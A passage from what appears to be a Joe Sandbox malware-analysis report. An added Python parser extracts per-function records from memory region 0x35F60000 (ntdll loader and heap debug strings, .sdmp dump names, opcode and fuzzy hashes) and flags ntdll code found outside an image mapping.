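The records above repeat one shape per function: the API call sites and string cross-references, the .sdmp region the function was lifted from (here 0x35F60000, "based on PE: true"), and the opcode / instruction fingerprints. What a triager wants from them is a structured view and one check: the strings are ntdll's own (CLIENT(ntdll) debug prefixes, minkernel\ntdll\ source paths), so the region they sit in should be a loader image mapping, and if the dump's type field says otherwise the ntdll code was copied there by something else. The parser below is an added example written for this report, not Joe Sandbox code. SAMPLE is constructed from two records on this page. The decoding of the dotted .sdmp name fields as PID / base / protection / state / type, with winnt.h PAGE_* and MEM_* meanings, is an assumption about the dump-naming convention; the report does not document that layout.

```python
"""Parse the per-function records of a Joe Sandbox report ("APIs", "Strings",
"Memory Dump Source", "Similarity") and flag ntdll code not backed by an image
mapping.  Added example, not Joe Sandbox code.  ASSUMPTION: an .sdmp name is
PID.run.timestamp.base.protection.state.type.x.sdmp using winnt.h PAGE_*/MEM_*
values; the report does not document that layout.  SAMPLE is constructed."""
import re
from dataclasses import dataclass, field

PAGE_PROTECT = {0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
SDMP_RE = re.compile(
    r"(?P<pid>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.\d+\.(?P<base>[0-9A-Fa-f]{16})\."
    r"(?P<prot>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})"
    r"\.[0-9A-Fa-f]{8}\.sdmp")
XREF_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<addrs>[0-9A-Fa-f]{8}(?:, [0-9A-Fa-f]{8})*)$")
APIREF_RE = re.compile(r"(?P<api>\w+\.\w+) ref: (?P<addr>[0-9A-Fa-f]{8})")

@dataclass
class Record:
    pid: int = 0
    base: int = 0
    protection: str = ""
    state: str = ""
    mem_type: str = ""
    based_on_pe: bool = False
    api_id: str = ""
    opcode_id: str = ""
    api_refs: list = field(default_factory=list)  # (api, call-site address)
    strings: list = field(default_factory=list)   # (text, [xref addresses])

def decode_sdmp(name):
    """(pid, base, protection, state, type) from an .sdmp file name, or None."""
    m = SDMP_RE.fullmatch(name)
    if not m:
        return None
    prot, state, mtype = (int(m.group(k), 16) for k in ("prot", "state", "type"))
    return (int(m.group("pid"), 16), int(m.group("base"), 16), PAGE_PROTECT.get(prot, hex(prot)),
            MEM_STATE.get(state, hex(state)), MEM_TYPE.get(mtype, hex(mtype)))

def parse_report(text):
    """One Record per function; APIs/Strings precede the Similarity block they belong
    to, so the 'Instruction Fuzzy Hash' line is what closes a record."""
    records, cur, section = [], Record(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            continue
        if not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs" and (m := APIREF_RE.search(body)):
            cur.api_refs.append((m.group("api"), int(m.group("addr"), 16)))
        elif section == "Strings" and (m := XREF_RE.match(body)):
            cur.strings.append((m.group("text"), [int(a, 16) for a in m.group("addrs").split(", ")]))
        elif section == "Memory Dump Source" and body.startswith("Source File: "):
            name, _, rest = body[len("Source File: "):].partition(", ")
            cur.based_on_pe = "based on PE: true" in rest
            if info := decode_sdmp(name):
                cur.pid, cur.base, cur.protection, cur.state, cur.mem_type = info
        elif section == "Similarity":
            key, _, value = body.partition(": ")
            if key in ("API ID", "Opcode ID"):
                setattr(cur, key.lower().replace(" ", "_"), value)   # api_id / opcode_id
            elif key == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = Record()
    return records

def ntdll_outside_image(records):
    """Records whose strings name ntdll (CLIENT(ntdll) prefixes, minkernel\\ntdll paths)
    inside a PE-shaped region that is not a MEM_IMAGE mapping: ntdll code the loader
    did not put there."""
    return [r for r in records if r.based_on_pe and r.mem_type != "MEM_IMAGE"
            and any("ntdll" in text for text, _ in r.strings)]

SAMPLE = r"""
APIs
• RtlDebugPrintTimes.NTDLL ref: 35F8651C
  • Part of subcall function 35F86565: RtlDebugPrintTimes.NTDLL ref: 35F86614
Strings
• minkernel\ntdll\ldrinit.c, xrefs: 35FE97A0, 35FE97C9
• LdrpInitShimEngine, xrefs: 35FE9783, 35FE9796, 35FE97BF
Memory Dump Source
• Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
Similarity
• API ID: DebugPrintTimes
• Opcode ID: 409c527a56085f349ce6ef5dca26479113ab7bc7fb4e6192743b4585d7bf22b8
• Instruction Fuzzy Hash: 215180716083089FE325DF24C991E5B77E9FF94784F400D1AFA95971A0DB30D909CBA2
Strings
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 36004530
Memory Dump Source
• Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
Similarity
• API ID:
• Instruction Fuzzy Hash: 975107B5A0131AAAEB10DBA5DC86FAD77B8AF04340F440CFDD905A7181DB709A45CFA4
"""

if __name__ == "__main__":
    for r in ntdll_outside_image(parse_report(SAMPLE)):
        print(f"pid {r.pid}: ntdll code at {r.base:#x} in a {r.protection} {r.state} "
              f"{r.mem_type} region; API {r.api_id or '-'}; opcode {r.opcode_id[:16] or '-'}")
```

Run against the full text export of the report instead of SAMPLE to get every function in the 0x35F60000 region in one pass; the Opcode ID column then serves as a stable key for matching the same functions across other reports, which the fuzzy hashes alone do not give you.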
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                  • API String ID: 3446177414-4227709934
                                                  • Opcode ID: 6cd3b933811a35f4194e82c4d5f759d746d2b02e0279be6148ccb759a152e411
                                                  • Instruction ID: 4f3e18d4c5ee6458471b9c3d474fe1f857ea23fc8fd8538ce7a487a73dda30b5
                                                  • Opcode Fuzzy Hash: 6cd3b933811a35f4194e82c4d5f759d746d2b02e0279be6148ccb759a152e411
                                                  • Instruction Fuzzy Hash: 5E413BB9E00209ABEB05DF99C982ADEBFF5BF88354F2000A9ED04A7240D7719941DF90
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                  • API String ID: 3446177414-3492000579
                                                  • Opcode ID: 504294e2252b98c0ee3e0709757520e110d789eae1cafd8f2b557b28edbd1246
                                                  • Instruction ID: 3d12f5b73c630ff85a886d4e0c5dd2b32a5cb6005b5f50c31612c0815e71dd91
                                                  • Opcode Fuzzy Hash: 504294e2252b98c0ee3e0709757520e110d789eae1cafd8f2b557b28edbd1246
                                                  • Instruction Fuzzy Hash: F271F0B5A02648AFCB05DFA8C4926ADFFF2FF49304F64849AE485AB251CB359941CB50
                                                  Strings
                                                  • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35FE9885
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 35FE9854, 35FE9895
                                                  • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35FE9843
                                                  • LdrpLoadShimEngine, xrefs: 35FE984A, 35FE988B
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-3589223738
                                                  • Opcode ID: a7763c4cd95499f2611bfcf9a85f9d95aea51a381a8d06a46af64f29a88b45bb
                                                  • Instruction ID: 28539a206d004062715d60624d9f6c3a4dea8213b050e005af02d53c6eabb80e
                                                  • Opcode Fuzzy Hash: a7763c4cd95499f2611bfcf9a85f9d95aea51a381a8d06a46af64f29a88b45bb
                                                  • Instruction Fuzzy Hash: F3511376B0034C9BDB18DBA8C856F9D7BB6BB60304F450969E651BF296CB709C42CB90
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                  • API String ID: 3446177414-3224558752
                                                  • Opcode ID: 607b49dcbf34491b43daaacd7991541b54aa080186ad389761134b94d434d4aa
                                                  • Instruction ID: 02b48467d68542e72a81abdb4e4f06ea46ceff79d54011a3655a1c6bfec6ac21
                                                  • Opcode Fuzzy Hash: 607b49dcbf34491b43daaacd7991541b54aa080186ad389761134b94d434d4aa
                                                  • Instruction Fuzzy Hash: EB41BD75604700DFEB01CF25C880B59B7B9FF40324F044DA8E416D7B92CBB9A881CB92
                                                  Strings
                                                  • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3603EDE3
                                                  • ---------------------------------------, xrefs: 3603EDF9
                                                  • Entry Heap Size , xrefs: 3603EDED
                                                  • HEAP: , xrefs: 3603ECDD
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                  • API String ID: 3446177414-1102453626
                                                  • Opcode ID: cccaf7901d8b5eb309187de51986fd59ffa1897f751f1bbf41151dfd7fa3551f
                                                  • Instruction ID: 0fc4ea2b1f736c0e97f0315ea7c1a7f42ac1f87422b420bd0038173275a1d2d8
                                                  • Opcode Fuzzy Hash: cccaf7901d8b5eb309187de51986fd59ffa1897f751f1bbf41151dfd7fa3551f
                                                  • Instruction Fuzzy Hash: 4A419D39A12219DFD708CF19C48695ABFF6FF8535573686EAD508AB210D731EC42CB90
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                  • API String ID: 3446177414-1222099010
                                                  • Opcode ID: 4a7fc059712ddeea726d04be336bab0da4f9c7937da793cd0f87b43029260988
                                                  • Instruction ID: 2243af867ba78d896462c76ecec4fa87919f10eb543a96a83eac4ebd0c650caf
                                                  • Opcode Fuzzy Hash: 4a7fc059712ddeea726d04be336bab0da4f9c7937da793cd0f87b43029260988
                                                  • Instruction Fuzzy Hash: 58315936205784EFEB16DB24C549F497BF9FF01754F054CC4E45297A61CBAAD940CB12
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$@
                                                  • API String ID: 3446177414-1194432280
                                                  • Opcode ID: 8fe407aad65b6ca5a234cba62d5a555ec2d461c639456a384f66301c7a5329b4
                                                  • Instruction ID: 4c7435b92433a06d5f989ae9e96f52732453723df30c1cfd9b39a020e7d18519
                                                  • Opcode Fuzzy Hash: 8fe407aad65b6ca5a234cba62d5a555ec2d461c639456a384f66301c7a5329b4
                                                  • Instruction Fuzzy Hash: 48814AB2D042699BDB25CF54CD41BDEB7B8BB08700F0145EAA919B7290E7709E85CFA1
                                                  Strings
                                                  • LdrpFindDllActivationContext, xrefs: 36003440, 3600346C
                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 3600344A, 36003476
                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 36003466
                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 36003439
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                  • API String ID: 3446177414-3779518884
                                                  • Opcode ID: c28a301ee0b87e2b45a105b3df8b02ba79c2eb87d6977e2b1b88cb39ef7c0302
                                                  • Instruction ID: 34cc4d45409454ed83ee5362963f0a3e1830cba94d712a97f0cf2dbe7b3f610d
                                                  • Opcode Fuzzy Hash: c28a301ee0b87e2b45a105b3df8b02ba79c2eb87d6977e2b1b88cb39ef7c0302
                                                  • Instruction Fuzzy Hash: E33149B6A04B27AFF716FB04C88DE59B2A5BB10396F4288F6D90367170D7A09C80C6D5
                                                  Strings
                                                  • LdrpDynamicShimModule, xrefs: 35FFA7A5
                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 35FFA79F
                                                  • apphelp.dll, xrefs: 35FB2382
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 35FFA7AF
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-176724104
                                                  • Opcode ID: 259f5499a0c72712fe0343deed060afcbc5006117572d79a388e59924e86adb9
                                                  • Instruction ID: 5f9dd778740ccf3f207e16d88a136485e34b4d2b68351142a788eddb64f498a2
                                                  • Opcode Fuzzy Hash: 259f5499a0c72712fe0343deed060afcbc5006117572d79a388e59924e86adb9
                                                  • Instruction Fuzzy Hash: 2D314C76A00204EFE718DF69C882E5E7BBBFB80B50F150A59ED45B7650DBF19842CB90
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 3446177414-3610490719
                                                  • Opcode ID: 55a1ec2c7937b32434e49fb35b846f51b18f3196a01b6053892633a68b714549
                                                  • Instruction ID: f007354b0199be0e88b368f04c5258501ba21e155cc1752a45da994c183d69c1
                                                  • Opcode Fuzzy Hash: 55a1ec2c7937b32434e49fb35b846f51b18f3196a01b6053892633a68b714549
                                                  • Instruction Fuzzy Hash: C2912876304741EFE316DB24CD44F2AB7AAFF84754F000C99E9559B281EB74E845CB92
                                                  APIs
                                                  Strings
                                                  • Failed to allocated memory for shimmed module list, xrefs: 35FF9F1C
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 35FF9F2E
                                                  • LdrpCheckModule, xrefs: 35FF9F24
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-161242083
                                                  • Opcode ID: 5f1974782e17145305c9b3c8778e76579e432e2d5176c0ab96f0d23705e1f9a2
                                                  • Instruction ID: 7c47e379bef5849f693b39c9f0d2f34fbef415c0772c5aec4b13e0c6fb037073
                                                  • Opcode Fuzzy Hash: 5f1974782e17145305c9b3c8778e76579e432e2d5176c0ab96f0d23705e1f9a2
                                                  • Instruction Fuzzy Hash: 4C710475A04209DFEF08DF69C981AAEB7F9FB44308F04886DD906E7650E7B4AD42CB50
                                                  APIs
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 360080F3
                                                  • Failed to reallocate the system dirs string !, xrefs: 360080E2
                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 360080E9
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-1783798831
                                                  • Opcode ID: 8c05a32d2d9ccb5b1b30b452599c861b279c5132db21742cf238eb324f53212e
                                                  • Instruction ID: 36cc144192683f7fd8b2b9184775381d6dcc04963ca410d79658e27db7239247
                                                  • Opcode Fuzzy Hash: 8c05a32d2d9ccb5b1b30b452599c861b279c5132db21742cf238eb324f53212e
                                                  • Instruction Fuzzy Hash: 694104B6614309ABD714DB64CD42B4B7BF9BF54750F010C6AF9A8A3250EB74D811CB92
                                                  APIs
                                                  Strings
                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 36014508
                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 36014519
                                                  • LdrpCheckRedirection, xrefs: 3601450F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                  • API String ID: 3446177414-3154609507
                                                  • Opcode ID: 50606ecadc86cd8af1cd8312bf05bd63fe58b6229b54cf7b0bd60d2f1e16a091
                                                  • Instruction ID: 73f69494a9ddb32296fdfc18e2d093e810ed206b7af3ef9a4b1bce43c9411b44
                                                  • Opcode Fuzzy Hash: 50606ecadc86cd8af1cd8312bf05bd63fe58b6229b54cf7b0bd60d2f1e16a091
                                                  • Instruction Fuzzy Hash: 7D41D37EA053219FDB10CF59C942A1A7FE5BF48794F0606E9ED48AB261D730D800CBE1
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Wow64 Emulation Layer
                                                  • API String ID: 3446177414-921169906
                                                  • Opcode ID: 552a85ac89287e7988b476de8a85a0e67b93133a4a02a1d18446f55f96100b49
                                                  • Instruction ID: 12d91f40e6ac5ee3fabafa5f8da873c80dc587c1babf8a999e5df13d4092abca
                                                  • Opcode Fuzzy Hash: 552a85ac89287e7988b476de8a85a0e67b93133a4a02a1d18446f55f96100b49
                                                  • Instruction Fuzzy Hash: 6E212CB6A0015DBFAB01ABA5CD89CFF7B7DEF44699B010894FA15A6100E7319E01DB71
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 558139086ef14e3e2c3d10787bddfad4ecdd7fad6e06ccff0e8dec786636e219
                                                  • Instruction ID: 3bd30f436e363d188fcd5d42e1db7d9dde26d1040be55658a9c12174f1068e8e
                                                  • Opcode Fuzzy Hash: 558139086ef14e3e2c3d10787bddfad4ecdd7fad6e06ccff0e8dec786636e219
                                                  • Instruction Fuzzy Hash: 19E1ED75E00708DFDF25CFAAC980A8DBBF5BF48344F20492AE546A7664DBB1A941CF10
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: eefc4c75fab2827a831fae7ef95fa79956b3abd131ffb9f2926249ea2beb9f18
                                                  • Instruction ID: 17d24338470390f98c84199c7adfdac48e829f78ac74e115b973db88aef66dc9
                                                  • Opcode Fuzzy Hash: eefc4c75fab2827a831fae7ef95fa79956b3abd131ffb9f2926249ea2beb9f18
                                                  • Instruction Fuzzy Hash: 44714575E002299FEF04CFA9D982ADDBBB5FF48314F1484AADA05BB241D735A906CF50
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: e916d4e2844276b4e87cfe8be568816344a7ba43a9dbf3ee34c9c018d2461cdb
                                                  • Instruction ID: 1b5116a8eba360c7c143f2c9673691ab115a0643a8f7f709058bcfceb2e27439
                                                  • Opcode Fuzzy Hash: e916d4e2844276b4e87cfe8be568816344a7ba43a9dbf3ee34c9c018d2461cdb
                                                  • Instruction Fuzzy Hash: 6B517274B146229FFB08EE1AC8926197BE1FF89358B1041ADD906EB711DBB5EC41CB80
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 9827a991b998c0f5abbad7d03ab22c1c1603410984bbd3091f408770c367f175
                                                  • Instruction ID: 01f9d00ff8e72c48e552abdb1bafa7a632edad168bdd6ce7a569c8ca40cb2b61
                                                  • Opcode Fuzzy Hash: 9827a991b998c0f5abbad7d03ab22c1c1603410984bbd3091f408770c367f175
                                                  • Instruction Fuzzy Hash: E25154B5E002189FEF04CF9AD842ADDBBF6BF48354F14806AE905BB250EB349941CF50
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                  • String ID:
                                                  • API String ID: 4281723722-0
                                                  • Opcode ID: f70ebb0b816cdf773a38532d2dd6d81837cdbc64fe761a2c45e21e4b75f5ef60
                                                  • Instruction ID: 5f5bdabb5278ccd9d1761b8be469a41ad6cbdcfae6a813f7e15c6eb17d6b8bf7
                                                  • Opcode Fuzzy Hash: f70ebb0b816cdf773a38532d2dd6d81837cdbc64fe761a2c45e21e4b75f5ef60
